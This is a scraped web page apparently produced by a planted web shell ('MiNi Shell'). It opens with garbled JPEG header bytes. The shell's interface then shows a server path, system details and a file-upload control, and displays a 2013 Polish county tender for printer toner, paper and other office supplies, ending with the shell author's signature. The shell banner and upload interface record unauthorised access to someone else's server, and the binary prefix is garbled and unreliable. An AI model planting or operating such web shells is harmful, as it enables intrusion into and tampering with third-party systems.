JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130215/24697-N-2013.html

<p class="kh_header"><b>Brodnica: Dostawa materiałów biurowych dla Starostwa Powiatowego w Brodnicy</b><br>
<b>Numer ogłoszenia: 24697 - 2013; data zamieszczenia: 15.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Brodnicki , ul. Kamionka 18, 87-300 Brodnica, woj. kujawsko-pomorskie, tel. 56 4950800, faks 56 4950801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brodnica.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych dla Starostwa Powiatowego w Brodnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów biurowych dla Starostwa Powiatowego w Brodnicy:
1.	Toner do drukarki Panasonic KX-MB2030PDW, oryginał producenta sprzętu - 2 szt.
2.	Toner do drukarki OKI B430d, oryginał producenta sprzętu, kolor czarny, wydajność 7000 kopii - 5 szt.
3.	Toner do drukarki KYOCERA FS-C525DN, oryginał producenta sprzętu, kolor black, wydajność 7000 kopii - 2 szt.
4.	Toner do drukarki KYOCERA FS-C525DN, oryginał producenta sprzętu, kolor Magenta, wydajność 5000 kopii - 2 szt.
5.	Toner do drukarki KYOCERA FS-C525DN, oryginał producenta sprzętu, kolor yellow, wydajność 5000 kopii - 2 szt.
6.	Toner do drukarki KYOCERA FS-C525DN, oryginał producenta sprzętu, kolor cyan, wydajność 5000 kopii - 2 szt.
7.	Toner do drukarki HP LaserJet 1020, oryginał producenta sprzętu, wydajność 2500 kopii - 15 szt.
8.	Toner do drukarki HP Color LaserJet 3600dn, oryginał producenta sprzętu, kolor black, wydajność 6000 kopii - 6 szt.
9.	Toner do drukarki HP Color LaserJet 3600dn, oryginał producenta sprzętu, kolor magenta, wydajność 4000 kopii - 4 szt.
10.	Toner do drukarki HP Color LaserJet 3600dn, oryginał producenta sprzętu, kolor yellow, wydajność 4000 kopii - 4 szt.
11.	Toner do drukarki HP Color LaserJet 3600dn, oryginał producenta sprzętu, kolor cyan, wydajność 4000 kopii - 4 szt.
12.	Toner do drukarki HP LaserJet 1200, oryginał producenta sprzętu, wydajność 2500 kopii - 2 szt.
13.	Toner do drukarki HP LaserJet P1505, oryginał producenta sprzętu, wydajność 2000 kopii - 15 szt.
14.	Toner do drukarki HP LaserJet P1006, oryginał producenta sprzętu, wydajność 1500 kopii - 10 szt.
15.	Toner do drukarki LaserJet 4250n, oryginał producenta sprzętu, wydajność 10000 kopii - 5 szt.
16.	Toner do drukarki HP LaserJet 1150, oryginał producenta sprzętu, wydajność 10000 kopii - 6 szt.
17.	Toner do drukarki Lexmark E120, oryginał producenta sprzętu, wydajność 2000 kopii - 20 szt.
18.	Toner do drukarki OKI B431d, oryginał producenta sprzętu, wydajność 12000 kopii - 3 szt.
19.	Tusz do drukarki HP DeskJet 5150, oryginał producenta sprzętu, kolor czarny, pojemność 19 ml - 1 szt.
20.	Tusz do drukarki HP DeskJet 5150, oryginał producenta sprzętu, kolor kolorowy, pojemność 17 ml - 1 szt.
21.	Tusz do drukarki Canon Pixma iP3600, oryginał producenta sprzętu, PGI 520 black, pojemność 19 ml - 1 szt.
22.	Tusz do drukarki HP DeskJet 5550, oryginał producenta sprzętu, kolor czarny, pojemność 19 ml - 1 szt.
23.	Tusz do drukarki HP DeskJet 5550, oryginał producenta sprzętu, kolor kolorowy, pojemność 17 ml - 1 szt.
24.	Tusz do drukarki HP DeskJet 930C, oryginał producenta sprzętu, kolor czarny, pojemność 42 ml - 6 szt.
25.	Tusz do drukarki HP DeskJet 930C, oryginał producenta sprzętu, kolor kolorowy, pojemność 38 ml - 6 szt.
26.	Tusz do drukarki HP DeskJet 940C, oryginał producenta sprzętu, kolor czarny, pojemność 25 ml - 3 szt.
27.	Tusz do drukarki HP DeskJet 940 C, oryginał producenta sprzętu, kolor kolorowy, pojemność 38 ml - 3 szt.
28.	Tusz do drukarki Brother MFC 465, oryginał producenta sprzętu, kolor black, pojemność 16 ml - 2 szt.
29.	Tusz do drukarki Brother MFC 465, oryginał producenta sprzętu, kolor magenta, pojemność 16 ml - 2 szt.
30.	Tusz do drukarki Brother MFC 465, oryginał producenta sprzętu, kolor yellow, pojemność 16 ml - 2 szt.
31.	Tusz do drukarki Brother MFC 465, oryginał producenta sprzętu, kolor cyan, pojemność 16 ml - 2 szt.
32.	Tusz do drukarki Canon IP2200, oryginał producenta sprzętu, kolor czarny, pojemność 16 ml - 5 szt.
33.	Tusz do drukarki Canon IP2200, oryginał producenta sprzętu, kolor kolorowy, pojemność 12 ml - 5 szt.
34.	Tusz do drukarki HP DeskJet 1120C, oryginał producenta sprzętu, kolor czarny, pojemność 42 ml - 3 szt.
35.	Tusz do drukarki HP DeskJet 1120C, oryginał producenta sprzętu, kolor kolorowy, pojemność 30 ml - 1 szt.
36.	Tusz do drukarki HP PSC 2355, oryginał producenta sprzętu, kolor czarny, pojemność 11 ml - 2 szt.
37.	Tusz do drukarki HP OfficeJet Pro 8100, oryginał producenta sprzętu, kolor black, pojemność 53 ml - 2 szt.
38.	Tusz do drukarki HP OfficeJet Pro 8100, oryginał producenta sprzętu, kolor magenta, pojemność 53 ml - 2 szt.
39.	Tusz do drukarki HP OfficeJet Pro 8100, oryginał producenta sprzętu, kolor yellow, pojemność 53 ml - 2 szt.
40.	Tusz do drukarki HP OfficeJet Pro 8100, oryginał producenta sprzętu, kolor cyan, pojemność 53 ml - 2 szt.
41.	Tusz do drukarki HP DeskJet 5940, oryginał producenta sprzętu, kolor czarny, pojemność 11 ml - 1 szt.
42.	Tusz do drukarki HP OfficeJet K7100, oryginał producenta sprzętu, kolor czarny, pojemność 11 ml - 3 szt.
43.	Tusz do drukarki HP OfficeJet K7100, oryginał producenta sprzętu, kolor kolorowy, pojemność 7 ml - 2 szt.
44.	Tusz do drukarki Brother DCP J925 DW, oryginał producenta sprzętu, kolor black, pojemność 11 ml - 5 szt.
45.	Tusz do drukarki Brother DCP J925 DW, oryginał producenta sprzętu, kolor magenta, pojemność 11 ml - 5 szt.
46.	Tusz do drukarki Brother DCP J925 DW, oryginał producenta sprzętu, kolor yellow, pojemność 11 ml - 5 szt.
47.	Tusz do drukarki Brother DCP J925 DW, oryginał producenta sprzętu, kolor cyan, pojemność 11 ml - 5 szt.
48.	Toner do kopiarki Konica Minolta Bizhub C-250, oryginał producenta sprzętu, kolor black, wydajność 12000 kopii - 9 szt.
49.	Toner do kopiarki Konica Minolta Bizhub C-250, oryginał producenta sprzętu, kolor cyan, wydajność 12000 kopii - 6 szt.
50.	Toner do kopiarki Konica Minolta Bizhub C-250, oryginał producenta sprzętu, kolor yellow, wydajność 12000 kopii - 9 szt.
51.	Toner do kopiarki Konica Minolta Bizhub C-250, oryginał producenta sprzętu, kolor magenta, wydajność 12000 kopii - 7 szt.
52.	Toner do kopiarki Nashuatec Dsm 725, 627, oryginał producenta sprzętu, wydajność 11000 kopii - 5 szt.
53.	Toner do kopiarki Nashuatec Dsm 616, oryginał producenta sprzętu, wydajność 9000 kopii - 20 szt.
54.	Toner do kopiarki Canon iR 2018, oryginał producenta sprzętu - 8 szt.
55.	Toner do kopiarki OKI MC860, oryginał producenta sprzętu, kolor black, wydajność 6000 kopii - 6 szt.
56.	Toner do kopiarki OKI MC860, oryginał producenta sprzętu, kolor magenta, wydajność 6000 kopii - 3 szt.
57.	Toner do kopiarki OKI MC860, oryginał producenta sprzętu, kolor yellow, wydajność 6000 kopii - 4 szt.
58.	Toner do kopiarki OKI MC860, oryginał producenta sprzętu, kolor cyan, wydajność 6000 kopii - 3 szt.
59.	Taśma do drukarki OKI 182-3320-3321, oryginał producenta sprzętu - 20 szt.
60.	Toner do drukarki HP LaserJet Q2300, oryginał producenta sprzętu, wydajność 6000 kopii - 1 szt.
61.	Koperta C6 biała SK a  1000 szt. - 25 op.
62.	Koperta C5 biała SK a  500 szt. - 6 op.
63.	Koperta C4 biała SK a  250 szt. - 5 op.
64.	Koperta kolor ecri - DL SK 110-220 bez okna - 100 szt.
65.	Koperta E-04HK brązowa torba RBG - 150 szt.
66.	Koperta na CD - bąbelkowa - 50 szt.
67.	Koperta biała DL SK Rozmiar 110x220 a 1000 szt. bez okna - 2 op.
68.	Papier ksero A4 80g/m2 500 ark. CIE 161 - 1550 ryz
69.	Papier ksero A3 80g/m2  500 ark. CIE 161 - 100 ryz
70.	Papier komputerowy 240x12 (1+1) - 20 kartonów
71.	Papier do faxu 210/30 - 10 szt.
72.	Rolka papierowa - offsetowa 57 mm - 30 szt.
73.	Segregator z dźwignią A4/50 z okuciem, okleina PCV - 60 szt.
74.	Segregator z dźwignią A4/70 z okuciem, okleina PCV - 280 szt.
75.	Segregator z dźwignią A4/80 z okuciem, okleina PCV - 50 szt.
76.	Długopis (automatyczny, chowany wkład, przeźroczysta obudowa, gumowy uchwyt, wymienny wkład) - 50 szt.
77.	Długopis żelowy (wymienny wkład olejowy z metalową skuwką, linia o grubości pisania 0,3 mm, długość minimum 6000 mb) - 50 szt.
78.	Cienkopis - różne kolory - 100 szt.
79.	Długopis na sprężynce, leżący, przylepny - 80 szt.
80.	Korektor w piórze z metalowa końcówką pojemność min. 9 ml, szybkoschnący - 30 szt.
81.	Korektor taśma - długość taśmy min. 7mb. - 20 szt.
82.	Ołówek HB z gumką, mocny grafit odporny na złamania - 50 szt.
83.	Gumka ołówkowa biała jednolita - 20 szt.
84.	Temperówka - metalowa, jednokomorowa - 30 szt.
85.	Pióro kulkowe, płynny tusz pigmentowy, nie wylewa przy zmianie ciśnienia atmosferycznego, grubość linii pisma ok. 0,6 mm, średnica kulki ok. 0,8 mm, wymienny wkład, wodoodporny i odporny na blaknięcia - 50 szt.
86.	Zszywki 24/6 (op. = 100 szt.)(miedziane) - 50 op.
87.	Spinacze 33mm okrągły biurowy (op. = 100 szt. ) - 50 op.
88.	Poduszka do stempli 70x110 mm, czerwona - 10 szt.
89.	Tusz do pieczątek, stempli 25-28 ml, czerwony, wodny, uniwersalny, nakrętka w kolorze tuszu, buteleczka z końcówką ułatwiającą nasączenie poduszek - 30 szt.
90.	Tusz do pieczątek, stempli 25-28 ml, czarny, wodny, uniwersalny, nakrętka w kolorze tuszu, buteleczka z końcówką ułatwiającą nasączenie poduszek - 5 szt.
91.	Rozszywasz - metalowa konstrukcja, plastikowa obudowa - 17 szt.
92.	Dziurkacz - od 20-25 kartek, podstawa i dźwignia metalowa, listwa formatów, blokada położenia dźwigni, głębokość wsuwania kartek 12mm, 5 lat gwarancji - 7 szt.
93.	Zszywacz - metalowy, zszywający od 20 - 25 kartek, max gł. wsuwania kartki 60mmm, ilość zszywek w magazynku 80 szt. 5 lat gwarancji, zszywki 24/6 - 10 szt.
94.	Zszywki HD 23/15 XL a 1000 galwanizowane - 5 op.
95.	Blok do flipcharta papierowy, gładki (50 kartek), rozmiar A1, perforacja kartek ułatwia ich zrywanie, gramatura papieru 70 g/m2 - 10 szt.
96.	Zakreślacz tekstu o długotrwałym działaniu, o dużej odporności na wysychanie, miękka płynna linia o szerokości 5,2 mm, ścięta końcówka pisząca, fluorescencyjne kolory tuszu, do zaznaczania i podkreślania na każdym papierze (również faksowym i kredowym), posiada okienko umożliwiające (śledzenie) zaznaczonego tekstu, kolor żółty, zielony, niebieski, różowy - 120 szt.
97.	Marker gruby ze stożkową końcówką, odporny na działanie światła, grubość linii od 1 do 4 mm, wodoodporny, piszący po większości powierzchni: kartonie, drewnie, metalu, kamieniu, tworzywach sztucznych, skórze, na mokrej i tłustej powierzchni, nie zawiera ksylenu i toluenu, metalowa obudowa, kolor czarny - 40 szt.
98.	Dysk CD-R (jednokrotnego zapisu) o pojemności 700MB w opakowaniu jednostkowym, opakowanie typu BOX o wymiarach 14,2x12,5x1 - 250 szt.
99.	Dysk DVD-R (jednokrotnego zapisu) o pojemności 4,7 GB w opakowaniu jednostkowym, każdy dysk w osobnej kopercie, prędkość zapisu 16x, opakowanie typu BOX o wymiarach 14,2x12,5x1 - 50 szt.
100.	Płyty CD-RW, 700 MB dysk kompaktowy wielokrotnego zapisu, umożliwiający zapis danych o poj. 700 MB (80 min. nagrania dźwiękowego), opakowanie typu BOX o wymiarach 14,2x12,5x1 - 20 szt.
101.	Płyty DVD-RW, 700 MB dysk kompaktowy wielokrotnego zapisu, umożliwiający zapis danych o poj. 4,7 GB, prędkość zapisu 16 x, opakowanie typu BOX o wymiarach 14,2x12,5x1 - 20 op.
102.	Foliopis dwustronny, uniwersalny pisze po niemal każdej gładkiej powierzchni, niezmywalny tusz, grubość 0,5 mm i 1 mm, odporny na światło, wysoką temperaturę i wodę, tuszem o wysokim stopniu nieprzeźroczystości, mocna obudowa z polipropylenu zapobiegająca wysychaniu tuszu - 40 szt.
103.	Tablica Flipcharta - magnetyczna tablica o wymiarach 100x70cm wykonana z lakierowanej stali - 1 szt.
104.	Papier wizytówkowy, ozdobny, kolor kremowy, A4, 160 g/m2 (op. 25 k) - 10 op.
105.	Papier wizytówkowy, ozdobny, kolor biały, A4, 160 g/m2 (op. 25 k) - 10 op..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.00-2, 30.19.16.44-2, 30.23.74.30-2, 30.23.43.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku Wykonawca zobowiązany jest wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy,
2. Pełnomocnictwo ustanawiające pełnomocnika do reprezentowania wykonawców</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wynagrodzenie należne Wykonawcy podlega automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brodnica.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe  w Brodnicy, ul. Kamionka 18, 87-300 Brodnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 10:00, miejsce: Starostwo Powiatowe  w Brodnicy, ul. Kamionka 18, 87-300 Brodnica, pokój Nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com